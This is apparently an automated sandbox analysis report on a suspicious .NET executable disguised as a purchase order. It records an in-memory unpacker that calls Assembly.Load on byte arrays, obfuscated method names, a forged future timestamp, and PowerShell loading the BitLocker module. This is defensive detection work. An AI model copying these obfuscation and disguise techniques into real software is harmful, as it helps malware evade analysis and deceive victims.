                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: NnLj.pdbSHA256 source: PURCHASE ORDER-6350-2024.exe
                        Source: Binary string: NnLj.pdb source: PURCHASE ORDER-6350-2024.exe

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.2b69bcc.1.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs.Net Code: MtQH1fVeKqYooKecnGf System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs.Net Code: MtQH1fVeKqYooKecnGf System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.5620000.5.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.2aa1a98.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: 0xC32C0DAC [Thu Oct 5 15:50:04 2073 UTC]
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DCD801 push es; ret 0_2_06DCD810
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DD5648 pushfd ; iretd 0_2_06DD56F9
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DD56F0 pushfd ; iretd 0_2_06DD56F9
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DDAE19 push eax; mov dword ptr [esp], edx0_2_06DDAE2C
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DD5638 pushad ; iretd 0_2_06DD5639
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06DDCE30 push es; ret 0_2_06DDCE40
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 0_2_06E1DE48 push esp; ret 0_2_06E1DE49
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeCode function: 6_2_0136F850 push es; ret 6_2_0136F860
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: section name: .text entropy: 7.717897542519251
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, L53jeqg7TU3usVYAQC.csHigh entropy of concatenated method names: 'av804Aq3dO', 'oPg0wsWmXc', 'iPh0inMgrG', 'm1H0BefjKc', 'veG0PnOHnK', 'ui20oeRsF6', 'jAH0vZC1xq', 'z5X0KWhxlE', 'f9M0uFZKDq', 'WpK0f30Yv6'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, s9YxdXpYvmj4sEtJwg.csHigh entropy of concatenated method names: 'HO1ZX0dFDv', 'i3BZ8prWVg', 'ToString', 'sRxZgSgPOe', 'lDJZjGiZuG', 'HgbZT43KMJ', 'zoWZbveHwY', 'KB1Zd2KZID', 'suQZOy0gHX', 'LgEZlEQ9U9'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, z8V6tSE9Kmk8VtHnQ3.csHigh entropy of concatenated method names: 'L5CdGnTvgO', 'B1qdjTHB0f', 'StGdb5CFl1', 'QTXdOyGcHV', 'Mbhdl9RtXq', 'MQebHF3Tss', 'RcAbsdgysV', 'yS1bLCMrSG', 'DL2ba6jfn3', 'QGdbCskcGG'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, F4KCalNgCf4yJJMxmi.csHigh entropy of concatenated method names: 'Dispose', 'twNcCypQt4', 'DafxBWJaWx', 'gPi77gulml', 'kHgcUuYmp0', 'BheczKE4aY', 'ProcessDialogKey', 'eaLxhP8s10', 'CnSxcYmxpC', 'bX5xxYUGmi'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, vP9haJacLPGwS8wXSo.csHigh entropy of concatenated method names: 'gPCOWRWtVk', 'lfgOrK9oJr', 'UIUOtL9dVg', 'LSmORlUOtj', 'wv7OVqjviB', 'CxQO6fGhUr', 'FeDOnNu062', 'fxsO4sQulE', 'bV8OwM5HIx', 'vbSOQiEOCC'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, IScEM5lWVrKlhRvUrx.csHigh entropy of concatenated method names: 'f8ScOHvsyX', 'CQMclHI8US', 'BGhcXUt12V', 'dBGc8wZ9V0', 'CvlcIcyqrA', 'dAucSPgoaM', 'TG85DLHDcuKtyVNtsE', 'vcZjHFlUJjecPQw7Qr', 'LQRccxpRSx', 'YE8c2pOpqN'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, kl5mmcflXMc65HWBwM.csHigh entropy of concatenated method names: 'z43ZaJ9ICd', 'MLqZUQGiTl', 'JTXyhUBsFF', 'g6YycB8J3W', 'yXQZfcO3pM', 'A2qZ9ylxBL', 'ueCZYEwZQV', 'qn0Z5nTE3R', 'LyLZe0C7Vu', 'C0fZJQkGX6'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, xjSqLJKLfArB0tpMCnq.csHigh entropy of concatenated method names: 'nmiDW2nTaS', 'sfiDrJEhwQ', 'Cn1DthvMD1', 'z6MDR33YNZ', 'EEyDVEGbo9', 'fKvD6tbi1S', 'Q4LDnVd7yr', 'O4ID4ancvc', 'FyIDwTOQrS', 'bfhDQjVN2v'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, FW07bIZxXrtNgWto45.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'M28xCk1chl', 'bqNxUJi5cj', 'WJJxzwRgaO', 'MbB2hbb01E', 'MkL2cbxg9c', 'D0o2x1DIOM', 'fd322XZAgl', 'UEtABwVANYrG79ytDCI'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, P3KWcgP03CKVL94tw3.csHigh entropy of concatenated method names: 'Ma7j5hJYxa', 'bg4jepGRwo', 'VJ3jJK1Tbv', 'cc2jMjpa1G', 'sI5jHbrttL', 'in9jsEXufZ', 'FdujLiQkKU', 'TsAja8hst3', 'JuTjCad4G4', 'HyFjUQAgur'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, gvDY8QB1YMmf2dncZA.csHigh entropy of concatenated method names: 'rmiTRqpWBA', 'bGQT6mDjw3', 'eAyT4lQquh', 't1dTw5SkW6', 'zSDTIv1EhE', 'mdMTSeNe5W', 'BVATZi9YXr', 'XseTyWURLl', 'yXrTD1SkeZ', 'K7KTFgtkVF'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, RgwcvmFYWkp0fMVSiK.csHigh entropy of concatenated method names: 's6Kygo7qZR', 'mPtyjV46c6', 'PgkyThw5Ku', 'CXEybHToy7', 'OkUydA6wws', 'nL5yOCChpk', 'lSOylIrOLn', 'J6Ayqx2RFb', 'rwcyXaT6yK', 'oI1y85gqsv'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, cmsXDtyGVO5FOEpadW.csHigh entropy of concatenated method names: 'efLDco7jCA', 'wZgD2xnuvK', 'P1QDNg6tUW', 'hF1DgYAUUC', 'wheDjVOWMF', 'YEBDb14kGl', 'oOODdaG1rr', 'vDMyL5MDrG', 'tG9yaiGFEV', 'FUxyC7dEp3'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, kBPjPwzFF5lF1uwwqm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b5AD06pxfl', 'dIfDIWQacJ', 'slDDSSAeEk', 'BhIDZNXPn3', 'TyiDy3dtBm', 'NodDDhcuZe', 'vqfDFF7Mel'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, ImIW4rKwf6tqNiiWNR3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c0xF5Pr4bY', 'cqkFeDi4OX', 'bPBFJvpMuD', 'mpOFMkQjyO', 'moiFH6fUNQ', 'c3YFsfO2uY', 'ECOFLOpiyw'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.csHigh entropy of concatenated method names: 'ImZ2Gx7xyZ', 'RqZ2gZFOMD', 'BjJ2jWuEDe', 'NG62TlLE7c', 'tEJ2b8N6le', 'tQu2drm0Ru', 'SIA2OPIVdm', 'Ekw2l5WILM', 'vle2qHvAuh', 'ziC2Xod8tV'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, l8ftM6oDY7WIIMNLOd.csHigh entropy of concatenated method names: 'C18bVSpGsQ', 'CNObnY7IF2', 'tC7Tm9QOhW', 'fnkTPZsumm', 'z4eToIHZWL', 'e4STAwWcnm', 'DovTvBY7nj', 'a80TKIynWT', 'gaLTppPsyK', 'mROTugtnN8'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, dyrVmPctQktPSrtNdw.csHigh entropy of concatenated method names: 'nXmOgoV2AG', 's4KOTERE7X', 'GLIOdu3IKS', 'qhCdUwvk9e', 'L7jdzOspfT', 'JbbOhtbYGT', 'TofOcBy4yc', 'D9SOx8X0D6', 'F23O21R0Qg', 'BWtONPaY0P'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, l2sJYh5K0ZNHRqvmDU.csHigh entropy of concatenated method names: 'e5vtvaU5e', 'L4qRU9qOW', 'flx6D0bih', 'B0GnhQH2d', 'g19wjoHRy', 'NGKQs9iho', 'N7eC3GKT6wBmVGvXic', 'a77CdxkuZemMFuw3Hk', 'nvQyVgcJY', 'KStFRUg8A'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, Qrig4VQZJw0SmAOp59.csHigh entropy of concatenated method names: 'be1Iuvnh8E', 'ki1I95fAFH', 'Q2xI5IFFIN', 'gnCIeRwoYG', 'WGFIBrbBjn', 'dXvImN6VJC', 'GfsIPFS2SZ', 'IN2IoimUxq', 'KoLIAwrg6T', 'ejEIv7tweD'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, icguhxMxu9hdKnfBif.csHigh entropy of concatenated method names: 'ToString', 'VirSfDdAFk', 'oviSBXFtS6', 'QMJSm4r73L', 'dGmSPc4qsg', 'QdJSocZdGy', 'JjmSA5PvlP', 'KYqSv6E8ty', 'x3iSKgsbe7', 'tQTSpEWubK'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, No5wVbGi2FjI1MyTZU.csHigh entropy of concatenated method names: 'vWsyiU9gdh', 'AypyB9b2Hq', 'nAgymChUpO', 'dE2yP4wQxG', 'eR2y5v2Jvn', 'MVRyoNRU0u', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, L53jeqg7TU3usVYAQC.csHigh entropy of concatenated method names: 'av804Aq3dO', 'oPg0wsWmXc', 'iPh0inMgrG', 'm1H0BefjKc', 'veG0PnOHnK', 'ui20oeRsF6', 'jAH0vZC1xq', 'z5X0KWhxlE', 'f9M0uFZKDq', 'WpK0f30Yv6'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, s9YxdXpYvmj4sEtJwg.csHigh entropy of concatenated method names: 'HO1ZX0dFDv', 'i3BZ8prWVg', 'ToString', 'sRxZgSgPOe', 'lDJZjGiZuG', 'HgbZT43KMJ', 'zoWZbveHwY', 'KB1Zd2KZID', 'suQZOy0gHX', 'LgEZlEQ9U9'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, z8V6tSE9Kmk8VtHnQ3.csHigh entropy of concatenated method names: 'L5CdGnTvgO', 'B1qdjTHB0f', 'StGdb5CFl1', 'QTXdOyGcHV', 'Mbhdl9RtXq', 'MQebHF3Tss', 'RcAbsdgysV', 'yS1bLCMrSG', 'DL2ba6jfn3', 'QGdbCskcGG'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, F4KCalNgCf4yJJMxmi.csHigh entropy of concatenated method names: 'Dispose', 'twNcCypQt4', 'DafxBWJaWx', 'gPi77gulml', 'kHgcUuYmp0', 'BheczKE4aY', 'ProcessDialogKey', 'eaLxhP8s10', 'CnSxcYmxpC', 'bX5xxYUGmi'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, vP9haJacLPGwS8wXSo.csHigh entropy of concatenated method names: 'gPCOWRWtVk', 'lfgOrK9oJr', 'UIUOtL9dVg', 'LSmORlUOtj', 'wv7OVqjviB', 'CxQO6fGhUr', 'FeDOnNu062', 'fxsO4sQulE', 'bV8OwM5HIx', 'vbSOQiEOCC'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, IScEM5lWVrKlhRvUrx.csHigh entropy of concatenated method names: 'f8ScOHvsyX', 'CQMclHI8US', 'BGhcXUt12V', 'dBGc8wZ9V0', 'CvlcIcyqrA', 'dAucSPgoaM', 'TG85DLHDcuKtyVNtsE', 'vcZjHFlUJjecPQw7Qr', 'LQRccxpRSx', 'YE8c2pOpqN'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, kl5mmcflXMc65HWBwM.csHigh entropy of concatenated method names: 'z43ZaJ9ICd', 'MLqZUQGiTl', 'JTXyhUBsFF', 'g6YycB8J3W', 'yXQZfcO3pM', 'A2qZ9ylxBL', 'ueCZYEwZQV', 'qn0Z5nTE3R', 'LyLZe0C7Vu', 'C0fZJQkGX6'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, xjSqLJKLfArB0tpMCnq.csHigh entropy of concatenated method names: 'nmiDW2nTaS', 'sfiDrJEhwQ', 'Cn1DthvMD1', 'z6MDR33YNZ', 'EEyDVEGbo9', 'fKvD6tbi1S', 'Q4LDnVd7yr', 'O4ID4ancvc', 'FyIDwTOQrS', 'bfhDQjVN2v'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, FW07bIZxXrtNgWto45.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'M28xCk1chl', 'bqNxUJi5cj', 'WJJxzwRgaO', 'MbB2hbb01E', 'MkL2cbxg9c', 'D0o2x1DIOM', 'fd322XZAgl', 'UEtABwVANYrG79ytDCI'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, P3KWcgP03CKVL94tw3.csHigh entropy of concatenated method names: 'Ma7j5hJYxa', 'bg4jepGRwo', 'VJ3jJK1Tbv', 'cc2jMjpa1G', 'sI5jHbrttL', 'in9jsEXufZ', 'FdujLiQkKU', 'TsAja8hst3', 'JuTjCad4G4', 'HyFjUQAgur'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, gvDY8QB1YMmf2dncZA.csHigh entropy of concatenated method names: 'rmiTRqpWBA', 'bGQT6mDjw3', 'eAyT4lQquh', 't1dTw5SkW6', 'zSDTIv1EhE', 'mdMTSeNe5W', 'BVATZi9YXr', 'XseTyWURLl', 'yXrTD1SkeZ', 'K7KTFgtkVF'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, RgwcvmFYWkp0fMVSiK.csHigh entropy of concatenated method names: 's6Kygo7qZR', 'mPtyjV46c6', 'PgkyThw5Ku', 'CXEybHToy7', 'OkUydA6wws', 'nL5yOCChpk', 'lSOylIrOLn', 'J6Ayqx2RFb', 'rwcyXaT6yK', 'oI1y85gqsv'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, cmsXDtyGVO5FOEpadW.csHigh entropy of concatenated method names: 'efLDco7jCA', 'wZgD2xnuvK', 'P1QDNg6tUW', 'hF1DgYAUUC', 'wheDjVOWMF', 'YEBDb14kGl', 'oOODdaG1rr', 'vDMyL5MDrG', 'tG9yaiGFEV', 'FUxyC7dEp3'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, kBPjPwzFF5lF1uwwqm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b5AD06pxfl', 'dIfDIWQacJ', 'slDDSSAeEk', 'BhIDZNXPn3', 'TyiDy3dtBm', 'NodDDhcuZe', 'vqfDFF7Mel'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, ImIW4rKwf6tqNiiWNR3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c0xF5Pr4bY', 'cqkFeDi4OX', 'bPBFJvpMuD', 'mpOFMkQjyO', 'moiFH6fUNQ', 'c3YFsfO2uY', 'ECOFLOpiyw'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.csHigh entropy of concatenated method names: 'ImZ2Gx7xyZ', 'RqZ2gZFOMD', 'BjJ2jWuEDe', 'NG62TlLE7c', 'tEJ2b8N6le', 'tQu2drm0Ru', 'SIA2OPIVdm', 'Ekw2l5WILM', 'vle2qHvAuh', 'ziC2Xod8tV'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, l8ftM6oDY7WIIMNLOd.csHigh entropy of concatenated method names: 'C18bVSpGsQ', 'CNObnY7IF2', 'tC7Tm9QOhW', 'fnkTPZsumm', 'z4eToIHZWL', 'e4STAwWcnm', 'DovTvBY7nj', 'a80TKIynWT', 'gaLTppPsyK', 'mROTugtnN8'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, dyrVmPctQktPSrtNdw.csHigh entropy of concatenated method names: 'nXmOgoV2AG', 's4KOTERE7X', 'GLIOdu3IKS', 'qhCdUwvk9e', 'L7jdzOspfT', 'JbbOhtbYGT', 'TofOcBy4yc', 'D9SOx8X0D6', 'F23O21R0Qg', 'BWtONPaY0P'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, l2sJYh5K0ZNHRqvmDU.csHigh entropy of concatenated method names: 'e5vtvaU5e', 'L4qRU9qOW', 'flx6D0bih', 'B0GnhQH2d', 'g19wjoHRy', 'NGKQs9iho', 'N7eC3GKT6wBmVGvXic', 'a77CdxkuZemMFuw3Hk', 'nvQyVgcJY', 'KStFRUg8A'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, Qrig4VQZJw0SmAOp59.csHigh entropy of concatenated method names: 'be1Iuvnh8E', 'ki1I95fAFH', 'Q2xI5IFFIN', 'gnCIeRwoYG', 'WGFIBrbBjn', 'dXvImN6VJC', 'GfsIPFS2SZ', 'IN2IoimUxq', 'KoLIAwrg6T', 'ejEIv7tweD'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, icguhxMxu9hdKnfBif.csHigh entropy of concatenated method names: 'ToString', 'VirSfDdAFk', 'oviSBXFtS6', 'QMJSm4r73L', 'dGmSPc4qsg', 'QdJSocZdGy', 'JjmSA5PvlP', 'KYqSv6E8ty', 'x3iSKgsbe7', 'tQTSpEWubK'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, No5wVbGi2FjI1MyTZU.csHigh entropy of concatenated method names: 'vWsyiU9gdh', 'AypyB9b2Hq', 'nAgymChUpO', 'dE2yP4wQxG', 'eR2y5v2Jvn', 'MVRyoNRU0u', 'Next', 'Next', 'Next', 'NextBytes'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
